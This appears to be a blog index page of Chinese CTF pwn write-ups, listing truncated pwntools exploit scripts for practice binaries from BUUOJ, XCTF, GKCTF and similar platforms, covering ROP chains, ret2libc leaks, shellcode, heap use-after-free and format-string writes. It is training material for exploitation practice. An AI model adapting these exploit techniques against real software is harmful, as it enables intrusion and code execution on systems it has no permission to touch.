GKCTF2021 checkin
from pwn import *context.log_level='debug'p = process('./login')elf = ELF('./login')libc = elf.libcputs_func = 0x00000000004018B5puts_got = 0x0000000000602028pop_rdi_ret = 0x0000000000401ab3main = 0x0000000000401A2Abss = 0x0000000000602400p.recv.原创 2021-06-27 23:11:36 · 516 阅读 · 0 评论 -
pwnable_start
from pwn import *loacl_elf = ELF("./start")context.arch = loacl_elf.arch#p = process("./start")p = remote("node3.buuoj.cn",28802)#gdb.attach(p, 'b* 0x08048060')#shellcode=asm(shellcraft.sh())shellcode = asm("xor ecx,ecx;\ xor edx,.原创 2021-03-13 22:22:31 · 349 阅读 · 0 评论 -
BJDCTF 2nd secret
from pwn import *p = remote('node3.buuoj.cn',27231)elf = ELF("./secret")p.recvuntil("# What's your name? _")payload = '/bin/sh\x00\x00\x00\x00\x00\x00\x00\x00\x00' + p32(elf.got['printf'])p.sendline(payload) answer = [0x476B,0x2D38,0x4540,0x3E77.原创 2021-01-11 11:10:50 · 109 阅读 · 0 评论 -
cmcc pwnme1
from pwn import *from LibcSearcher import LibcSearcher#p = process('./pwnme1')p = remote("node3.buuoj.cn",29175)elf = ELF('./pwnme1')plt_puts = elf.plt['puts']got_puts = elf.got['puts']main = elf.symbols["main"]getfruit_addr = 0x08048624payload =.原创 2020-12-27 19:31:14 · 240 阅读 · 0 评论 -
cmcc pwnme2
from pwn import *#p = process('./pwnme2')p = remote("node3.buuoj.cn",26522)libc = ELF('./libc-2.23.so')plt_puts = 0x08048490got_puts = 0x0804A028main = 0x080486F8payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts).原创 2020-12-25 22:33:53 · 307 阅读 · 0 评论 -
xctf level3
from pwn import *#p = process(['./level3'],env={"LD_PRELOAD":"./libc_32.so.6"})p = remote("220.249.52.134",36907)libc = ELF("./libc_32.so.6")write_plt = 0x08048340write_got = 0x0804A018main = 0x0804844B#p = remote("220.249.52.133",54612)p.recvun.原创 2020-12-12 20:53:49 · 131 阅读 · 0 评论 -
xctf int_overflow
from pwn import *#p = process('./int_overflow')p = remote("220.249.52.133",54612)p.recvuntil('Your choice:')p.sendline('1')p.recvuntil('username:\n')p.sendline('1')p.recvuntil('passwd:\n')payload = '\x04'*24 + p32(0x0804868B) + 'c'*(260-28)#gdb.原创 2020-12-09 22:43:28 · 113 阅读 · 0 评论 -
xctf guess_num
from pwn import *#p = process('./guess_num')p = remote("220.249.52.133",41750)p.recvuntil('Your name:')payload = 'a'*32 + p64(1)#gdb.attach(p,'b* rebase(0x0000000000000D2B)')p.sendline(payload)p.recvuntil('number:')p.sendline('2')p.recvuntil('nu.原创 2020-12-09 21:40:27 · 128 阅读 · 0 评论 -
xctf string
from pwn import *#p = process('./string')p = remote("220.249.52.133",37754)p.recvuntil('secret[0] is ')addr = int(p.recv(7),16)log.sucess(hex(addr))p.recvuntil("name be:\n")p.sendline('test')p.recvuntil('east or up?:\n')p.sendline('east')p.recv.原创 2020-12-09 21:09:04 · 208 阅读 · 0 评论 -
0ctf2017 babyheap
from pwn import *#p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"})p = remote("node3.buuoj.cn",26165)elf = ELF('./0ctf_2017_babyheap')libc = ELF("./libc-2.23.so")def Allocate(size): p.recvuntil('Command: ') p.sendl.原创 2020-12-06 17:56:50 · 160 阅读 · 0 评论 -
buu hacknote
from pwn import *#p = process('./hacknote')p = remote("node3.buuoj.cn",29460)got_atoi = 0x0804A034#elf = ELF('./hacknote')#libc = elf.libclibc = ELF('./libc-2.23.so')def Add(size,context): p.recvuntil('Your choice :') p.sendline('1') p....原创 2020-12-06 12:48:18 · 135 阅读 · 0 评论 -
ropemporium新通关脚本
1)ret2win32from pwn import *catflag = 0x0804862Cp = process('./ret2win32')payload = 'A'*0x28 + p32(0) + p32(catflag) p.recvuntil('> ')p.send(payload)p.interactive()2)ret2winfrom pwn import *catflag = 0x0000000000400756p = process('./ret2win'原创 2020-09-27 21:25:24 · 265 阅读 · 5 评论 -
hitcontraining magicheap
from pwn import *magic = 0x00000000006020A0#p = process('./magicheap')p = remote("node3.buuoj.cn",26020)def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:原创 2020-06-16 22:05:38 · 355 阅读 · 0 评论 -
ciscn2019 pwn3
from pwn import *p = process("./ciscn_2019_n_3")elf = ELF('./ciscn_2019_n_3')def do_new_text(idx, lens, content): p.sendlineafter("CNote > ", '1') p.sendlineafter("Index > ", str(idx)) p.sendlineafter("Type > ", '2') p.sendlin原创 2020-05-26 07:34:41 · 363 阅读 · 0 评论 -
cmcc simplerop
from pwn import *p = process('./simplerop')p.recv()int80_addr = 0x080493e1pop_eax = 0x080bae06read = 0x0806CD50binsh = 0x080EB584pop_edx_ecx_ebx = 0x0806e850payload = 'a'*0x20 + p32(read) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh) + p32(0x8)payl原创 2020-05-25 23:58:43 · 224 阅读 · 0 评论 -
bjdctf2020 babyrop2
from pwn import *p = process('bjdctf_2020_babyrop2')libcelf = ELF('/lib/x86_64-linux-gnu/libc.so.6')poprdiret = 0x0000000000400993main = 0x00000000004008DA pltputs = 0x0000000000400610gotputs = 0x0000000000601018p.sendlineafter("I'll give u some gif原创 2020-05-23 22:30:56 · 292 阅读 · 0 评论 -
V&N2020 simpleHeap
# coding:utf-8from pwn import *context(os='linux', arch='amd64', log_level='debug')p = process('./vn_pwn_simpleHeap')def add(size, content): p.sendlineafter("choice: ", '1') p.sendlineafter("size?", str(size)) p.sendlineafter("content:",原创 2020-05-20 22:41:01 · 246 阅读 · 0 评论 -
ZJCTF 2019 Login
from pwn import *p = process('./login')p.sendlineafter("username: ","admin")payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88)p.sendlineafter("password: ",payload)p.interactive()原创 2020-05-19 21:21:27 · 647 阅读 · 0 评论 -
hitcontraining hacknote
from pwn import *p = process('./hacknote')def add(size, content): p.sendlineafter('Your choice :', '1') p.sendlineafter('Note size :', str(size)) p.sendlineafter('Content :', content)def delete(idx): p.sendlineafter('Your choice :', '2')原创 2020-05-19 19:28:57 · 122 阅读 · 0 评论 -
bjdctf 2020 babystack2
from pwn import *p = process('./bjdctf_2020_babystack2')p.sendlineafter("length of your name:\n","-1")payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726)p.sendlineafter("name?\n",payload)p.interactive()原创 2020-05-19 19:26:58 · 238 阅读 · 0 评论 -
ez_pz_hackover_2016
测试栈溢出偏移量from pwn import *p = process('./ez_pz_hackover_2016')libc = ELF('/lib/i386-linux-gnu/libc.so.6')elf = ELF('./ez_pz_hackover_2016')context.log_level = 'debug'context.arch = elf.archpayload = 'crashme\x00' + 'aaaabaaacaaadaaaeaaafaaagaaahaaai原创 2020-05-12 07:49:20 · 316 阅读 · 2 评论 -
sctf2016 pwn2
from pwn import *from LibcSearcher import *main = 0x080485B8gotatoi = 0x0804A020formatstr = 0x080486F8pltprintf = 0x08048370p = process('./pwn2_sctf_2016')p.recvuntil("How many bytes do you want me to read? ")p.sendline('-1')p.recvuntil("data!\n")原创 2020-05-11 20:35:54 · 174 阅读 · 0 评论 -
bjdctf2020 babyrop
from pwn import *p = process('./bjdctf_2020_babyrop')libcelf = ELF('./libc-2.23.so')pop_rdi_ret = 0x0000000000400733pop_rsi_r15_ret = 0x0000000000400731pltputs = 0x00000000004004E0main = 0x00000000004006ADgotputs = 0x0000000000601018payload = 'a' *原创 2020-05-09 22:04:08 · 299 阅读 · 0 评论 -
铁人三项(第五赛区)2018 rop
from pwn import *p = process('./2018_rop')gotwrite = 0x0804A010pltwrite = 0x080483A0start = 0x080483C0bss = 0x0804A020pltread = 0x08048360def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04原创 2020-05-09 21:12:32 · 498 阅读 · 0 评论 -
bjdctf2020 babystack
from pwn import *p = process('./bjdctf_2020_babystack')p.recvuntil("length of your name:\n")p.sendline('1024')p.recvuntil("What's u name?\n")payload = 'a'*12 + p32(1024) + 'a'*8 + p64(0x000000000...原创 2020-05-08 08:03:53 · 350 阅读 · 2 评论 -
HarekazeCTF2019 baby_rop2
from pwn import *p = process('./babyrop2')libcelf = ELF('./libc-2.23.so')p = process('./babyrop2')p.recvuntil("What's your name? ")pltprintf = 0x00000000004004F0gotread = 0x0000000000601020popr...原创 2020-05-07 22:20:20 · 242 阅读 · 0 评论 -
ciscn_2019_n_8 wirte bss data
from pwn import *p = process("./ciscn_2019_n_8")p.recvuntil('name?\n')payload = p32(0x11) * 14p.sendline(payload)p.interactive()原创 2020-05-02 22:49:39 · 263 阅读 · 0 评论 -
ciscn_2019_en_2 ret2libc64
from pwn import *elf = ELF('./libc-2.23.so')p = process("./ciscn_2019_en_2")p.recvuntil('choice!\n')p.sendline("1")p.recvuntil('encrypted\n')poprdiret = 0x0000000000400c83pltputs = 0x0000000000...原创 2020-05-02 22:48:32 · 301 阅读 · 0 评论 -
buuoj return 2 DynELF level4
from pwn import *#p = process('./level4')p = remote("node3.buuoj.cn", 27510)elf = ELF('./level4')pltwrite = 0x08048340gotwrite = 0x0804A018pltread = 0x08048310bss_addr = 0x0804A024start = 0...原创 2020-04-29 22:03:41 · 114 阅读 · 0 评论 -
buuoj level3 x64 return to libc
from pwn import *#p = process('./pwn')#p = process('./level3_x64')p = remote("node3.buuoj.cn",25333)p.recvuntil("Input:\n")libc = ELF('./libc-2.23.so')poprdiret = 0x00000000004006b3poprsir15r...原创 2020-04-29 09:51:34 · 236 阅读 · 0 评论 -
[第五空间2019 决赛]PWN5
from pwn import *#p = process('./pwn')p = remote("node3.buuoj.cn",25955)addr_unk_804C044 = 0x0804C044payload = fmtstr_payload(10,{addr_unk_804C044:0x01})p.sendlineafter('your name:',payload)p.se...原创 2020-04-27 20:47:08 · 804 阅读 · 0 评论 -
DCICHF 2020 count
main函数:__int64 sub_400990(){ unsigned int v0; // w0 __int64 v1; // x0 __int64 v2; // x0 __int64 v3; // x0 __int64 v4; // x0 __int64 v6; // [xsp+10h] [xbp+10h] __int64 v7; // [xsp+78h] ...原创 2020-04-19 17:54:51 · 151 阅读 · 0 评论 -
buuoj BJDCTF 2nd ydsneedgirlfriend2
free 函数代码:free 以后没有把指针置空,留下悬空指针unsigned __int64 dele(){…… free(*(void **)girlfriends[v1]); free((void *)girlfriends[v1]); ……}因此被释放的块仍可通过原指针再次访问或再次释放(UAF / double free),可以再次利用from pwn import *#sh = process('./ydsneedgirlfriend2')def ad...原创 2020-03-30 22:36:08 · 334 阅读 · 0 评论 -
buuoj BJDCTF 2nd r2t3
buf定义长度为0x400。而buf的长度为0x408所以不存在溢出(原文此处的两个长度含义待核实)。可见 name_check 函数存在安全漏洞,但是要绕过长度限制。unsigned __int8 v3 定义的数据类型实际为 unsigned char,仅有 1 个字节:超过 1 个字节的高位数据会被截断,最大数值为 0xff,而 0x100 = 256 截断后等于 0。因此传入 0x104 至 0x107 的长度即可满足上面的检查条件,这就是所谓的整型溢出(整数截断)...原创 2020-03-26 22:31:28 · 701 阅读 · 0 评论 -
buuoj jarvisoj_test_your_memory
存在溢出漏洞:程序进行了逻辑判断,相等则输出 good job!!!从堆栈上看,s2 在返回地址下方。综合以上分析,脚本如下:from pwn import*p = process('./memory')system_addr = 0x08048440catflag_addr = 0x080487E0payload='A'*0x17 + p32(system_addr...原创 2020-03-26 21:39:30 · 286 阅读 · 0 评论 -
buuoj jarvisoj_tell_me_something
main函数:int __cdecl main(int argc, const char **argv, const char **envp){ __int64 v4; // [rsp+0h] [rbp-88h] write(1, "Input your message:\n", 0x14uLL); read(0, &v4, 0x100uLL); return wri...原创 2020-03-26 09:29:54 · 170 阅读 · 0 评论 -
buuoj BJDCTF 2nd one_gadget
程序会输出 printf 函数的真实地址,据此(减去 printf 在 libc 中的偏移)可以算出 libc 基址,再利用 one_gadget 工具找出 libc 中可用的 one-gadget 偏移from pwn import *#p = process('./one_gadget')p = remote("node3.buuoj.cn",26742)out = p.recv()addr = int(out[out.find('0x')+2:out.find('0x')+14],16)...原创 2020-03-25 23:59:30 · 617 阅读 · 0 评论 -
buuctf jarvisoj_fm
存在格式化字符串漏洞。而实际上 x 的值为 3,需要通过格式化字符串漏洞来重写 x 的值。先使用 aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x 测试格式化字符串在栈上的参数偏移:可控字符串位于第 11 个参数处。可以使用 %n 向该参数所指向的地址写入"已输出的字符数"。使用 %11$n,意思是把已输出的字符数写入第 11 个参数(即 x 的地址 0x0804A02C)所指向的 32 位大小的一个...原创 2020-03-19 23:10:46 · 300 阅读 · 0 评论 -